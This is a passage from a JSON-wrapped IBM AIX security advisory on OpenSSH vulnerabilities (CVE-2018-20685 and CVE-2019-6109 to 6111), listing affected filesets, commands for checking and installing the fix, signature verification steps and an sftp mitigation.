levels are vulnerable:\n\n key_fileset = osrcaix\n\n Fileset Lower Level Upper Level KEY\n -------------------------------------------------------------\n openssh.base.client 4.0.0.5200 7.5.102.1600 key_w_fs\n openssh.base.server 4.0.0.5200 7.5.102.1600 key_w_fs\n\n Note: To determine if your system is vulnerable, execute the\n following commands:\n\n lslpp -L | grep -i openssh.base.client\n lslpp -L | grep -i openssh.base.server\n\n\n REMEDIATION:\n\n FIXES\n\n A fix is available for CVE-2018-20685, CVE-2019-6109, and \n CVE-2019-6111, and it can be downloaded from:\n https://www-01.ibm.com/marketing/iwm/iwm/web/pickUrxNew.do?source=aixbp&S_PKG=openssh\n\n Please see the WORKAROUNDS AND MITIGATIONS section for mitigation\n steps in response to CVE-2019-6110.\n\n To extract the fixes from the tar file:\n\n For Openssh 7.5 version -\n 
zcat openssh-7.5.102.1800.tar.Z | tar xvf -\n\n Please refer to the Readme file to be aware of the changes that\n are part of the release.\n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n Note that all the previously reported security vulnerability fixes\n are also included in the above-mentioned fileset level. Please refer\n to the readme file (provided along with the fileset) for the\n complete list of vulnerabilities fixed.\n\n To preview the fix installation:\n\n installp -apYd . openssh\n\n To install the fix package:\n\n installp -aXYd . openssh\n\n\n Published advisory OpenSSH signature file location:\n\n http://aix.software.ibm.com/aix/efixes/security/openssh_advisory13.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/openssh_advisory13.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/openssh_advisory13.asc.sig\n\n openssl dgst -sha1 -verify [pubkey_file] -signature [advisory_file].sig [advisory_file]\n\n openssl dgst -sha1 -verify [pubkey_file] -signature [ifix_file].sig [ifix_file]\n\n\n WORKAROUNDS AND MITIGATIONS:\n\n The potential impact of CVE-2019-6110 may be mitigated by using the\n sftp command in place of the scp command.\n\n\n===============================================================================\n\nCONTACT US:\n\n Note: Keywords labeled as KEY in this document are used for parsing\n purposes.\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n https://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n https://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n\n Contact IBM Support for questions related to this announcement:\n\n http://ibm.com/support/\n https://ibm.com/support/\n\n To obtain the OpenSSL 
public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\nftp://ftp.software.ibm.com/systems/power/AIX/systems_p_os_aix_security_pubkey.txt\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n\n Complete CVSS v3 Guide:\n http://www.first.org/cvss/user-guide\n https://www.first.org/cvss/user-guide\n\n On-line Calculator v3:\n http://www.first.org/cvss/calculator/3.0\n https://www.first.org/cvss/calculator/3.0\n\n\nRELATED INFORMATION:\n\n IBM Secure Engineering Web Portal\n http://www.ibm.com/security/secure-engineering/bulletins.html\n\n IBM Product Security Incident Response Blog\n https://www.ibm.com/blogs/psirt/\n\n Security Bulletin: Vulnerabilities in OpenSSH affect AIX \n https://www-01.ibm.com/support/docview.wss?uid=ibm10872060\n\n\nACKNOWLEDGEMENTS:\n\n None.\n\n\nCHANGE HISTORY:\n\n First Issued: Tue Jul 16 09:38:57 CDT 2019\n\n\n===============================================================================\n\n*The CVSS Environment Score is customer environment specific and will\nultimately impact the Overall CVSS Score. Customers can evaluate the\nimpact of this vulnerability in their environments by accessing the links\nin the Reference section of this Flash.\n\nNote: According to the Forum of Incident Response and Security Teams\n(FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry\nopen standard designed to convey vulnerability severity and help to\ndetermine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES\n\"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF\nMERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE\nRESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY\nVULNERABILITY.\n\n\n\n", "edition": 1, "modified": "2019-07-16T09:38:57", "published": "2019-07-16T09:38:57", "id": "OPENSSH_ADVISORY13.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/openssh_advisory13.asc", "title": "Vulnerabilities in OpenSSH affect AIX.", "type": "aix", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}